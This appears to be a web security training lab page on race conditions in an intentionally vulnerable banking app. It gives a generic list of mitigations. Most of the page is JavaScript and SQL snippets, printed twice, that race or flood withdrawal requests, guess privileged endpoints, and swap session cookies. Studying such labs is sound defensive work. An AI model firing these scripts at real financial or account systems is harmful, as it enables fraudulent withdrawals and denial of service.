Lab 4: Race Conditions - Business Logic Labs

Difficulty: High

Lab Overview

This lab demonstrates race condition vulnerabilities where attackers can exploit timing-based vulnerabilities to gain unauthorized benefits, bypass controls, and manipulate business logic.

Objective: Understand how race condition attacks work and how to exploit them.

Vulnerable Banking System

Account Operations

This system allows account operations. Try to exploit race conditions:

Race Condition Tester

⚠️ Race Condition Warning

This lab demonstrates race condition vulnerabilities:

No Locking - No proper locking mechanism
Timing Issues - Timing-based vulnerabilities
Concurrent Access - Multiple simultaneous requests
No Validation - No proper validation

Race Condition Techniques

These techniques can be used for race conditions:

Concurrent Requests - Multiple simultaneous requests
Timing Attacks - Exploit timing windows
State Manipulation - Manipulate shared state
Resource Exhaustion - Exhaust system resources

Account Balance

Current Balance

$1,000.00

Race Condition Techniques

Concurrent Requests

// Send multiple requests simultaneously const promises = []; for (let i = 0; i < 10; i++) { promises.push( fetch('/withdraw', { method: 'POST', body: 'amount=100' }) ); } Promise.all(promises);

Timing Attacks

// Exploit timing windows setTimeout(() => { fetch('/withdraw', {method: 'POST', body: 'amount=100'}); }, 0); setTimeout(() => { fetch('/withdraw', {method: 'POST', body: 'amount=100'}); }, 1);

State Manipulation

// Manipulate shared state const state = {balance: 1000}; // Multiple operations on same state state.balance -= 100; // Request 1 state.balance -= 100; // Request 2 // Both see same initial state

Resource Exhaustion

// Exhaust system resources for (let i = 0; i < 1000; i++) { fetch('/withdraw', { method: 'POST', body: 'amount=1' }); }

Lock Bypass

// Bypass locking mechanisms // Use different endpoints fetch('/admin/withdraw', {method: 'POST', body: 'amount=100'}); fetch('/internal/withdraw', {method: 'POST', body: 'amount=100'}); fetch('/bypass/withdraw', {method: 'POST', body: 'amount=100'});

Session Manipulation

// Manipulate session state // Use different session IDs fetch('/withdraw', { method: 'POST', headers: {'Cookie': 'session_id=1'}, body: 'amount=100' }); fetch('/withdraw', { method: 'POST', headers: {'Cookie': 'session_id=2'}, body: 'amount=100' });

Vulnerability Details

Type: Race Condition
Severity: High
Method: Concurrent requests
Issue: No proper locking mechanism

Attack Vectors

Concurrent Requests: Multiple simultaneous requests
Timing Attacks: Exploit timing windows
State Manipulation: Manipulate shared state
Resource Exhaustion: Exhaust system resources

Race Condition Examples

Use these techniques to exploit race condition vulnerabilities:

1. Basic Race Condition:

// Send multiple requests simultaneously
const promises = [];
for (let i = 0; i < 10; i++) {
    promises.push(
        fetch('/withdraw', {
            method: 'POST',
            body: 'amount=100'
        })
    );
}
Promise.all(promises);

2. Timing Attack:

// Exploit timing windows
setTimeout(() => {
    fetch('/withdraw', {method: 'POST', body: 'amount=100'});
}, 0);
setTimeout(() => {
    fetch('/withdraw', {method: 'POST', body: 'amount=100'});
}, 1);

3. State Manipulation:

// Manipulate shared state
const state = {balance: 1000};
// Multiple operations on same state
state.balance -= 100; // Request 1
state.balance -= 100; // Request 2
// Both see same initial state

4. Resource Exhaustion:

// Exhaust system resources
for (let i = 0; i < 1000; i++) {
    fetch('/withdraw', {
        method: 'POST',
        body: 'amount=1'
    });
}

5. Lock Bypass:

// Bypass locking mechanisms
// Use different endpoints
fetch('/admin/withdraw', {method: 'POST', body: 'amount=100'});
fetch('/internal/withdraw', {method: 'POST', body: 'amount=100'});
fetch('/bypass/withdraw', {method: 'POST', body: 'amount=100'});

6. Session Manipulation:

// Manipulate session state
// Use different session IDs
fetch('/withdraw', {
    method: 'POST',
    headers: {'Cookie': 'session_id=1'},
    body: 'amount=100'
});
fetch('/withdraw', {
    method: 'POST',
    headers: {'Cookie': 'session_id=2'},
    body: 'amount=100'
});

7. Database Race Condition:

// Database race condition
// Multiple transactions on same record
BEGIN TRANSACTION;
SELECT balance FROM accounts WHERE id = 1;
UPDATE accounts SET balance = balance - 100 WHERE id = 1;
COMMIT;

// Another transaction at same time
BEGIN TRANSACTION;
SELECT balance FROM accounts WHERE id = 1;
UPDATE accounts SET balance = balance - 100 WHERE id = 1;
COMMIT;

8. File System Race Condition:

// File system race condition
// Multiple processes accessing same file
if (file_exists('lock.txt')) {
    // Process 1 checks file
    // Process 2 checks file at same time
    // Both proceed without proper locking
}

9. Memory Race Condition:

// Memory race condition
// Multiple threads accessing shared memory
int balance = 1000;
// Thread 1: balance -= 100;
// Thread 2: balance -= 100;
// Both read 1000, both write 900
// Result: 900 instead of 800

10. API Race Condition:

// API race condition
// Multiple API calls to same endpoint
const apiCalls = [];
for (let i = 0; i < 100; i++) {
    apiCalls.push(
        fetch('/api/withdraw', {
            method: 'POST',
            headers: {'Content-Type': 'application/json'},
            body: JSON.stringify({amount: 100})
        })
    );
}
Promise.all(apiCalls);

11. WebSocket Race Condition:

// WebSocket race condition
const ws1 = new WebSocket('ws://localhost:8080');
const ws2 = new WebSocket('ws://localhost:8080');

ws1.onopen = () => {
    ws1.send(JSON.stringify({action: 'withdraw', amount: 100}));
};
ws2.onopen = () => {
    ws2.send(JSON.stringify({action: 'withdraw', amount: 100}));
};

12. Cache Race Condition:

// Cache race condition
// Multiple processes updating cache
const cache = new Map();
// Process 1: cache.set('balance', 900);
// Process 2: cache.set('balance', 900);
// Both read same value, both write same value

13. Queue Race Condition:

// Queue race condition
// Multiple consumers processing same queue
const queue = [];
// Consumer 1: processes item
// Consumer 2: processes same item
// Both process same item

14. Distributed System Race Condition:

// Distributed system race condition
// Multiple nodes updating same data
// Node 1: updates balance
// Node 2: updates balance at same time
// Both see same initial state

15. Microservice Race Condition:

// Microservice race condition
// Multiple services updating same data
const service1 = 'http://service1:8080/withdraw';
const service2 = 'http://service2:8080/withdraw';

fetch(service1, {method: 'POST', body: 'amount=100'});
fetch(service2, {method: 'POST', body: 'amount=100'});

Real-World Attack Scenarios

Financial losses and revenue impact
Data corruption and integrity issues
Unauthorized access and privilege escalation
Compliance violations and legal issues
Business process disruption and operational impact
System instability and performance issues

Mitigation Strategies

Implement proper locking mechanisms
Use atomic operations and transactions
Implement proper concurrency control
Use secure coding practices
Regular security testing and vulnerability assessments
Monitor for unusual concurrency patterns
Implement proper input validation
Use secure session management
Implement proper error handling
Educate users about security threats
Use multi-factor authentication
Implement proper logging and monitoring
Use race condition detection tools
Implement proper audit trails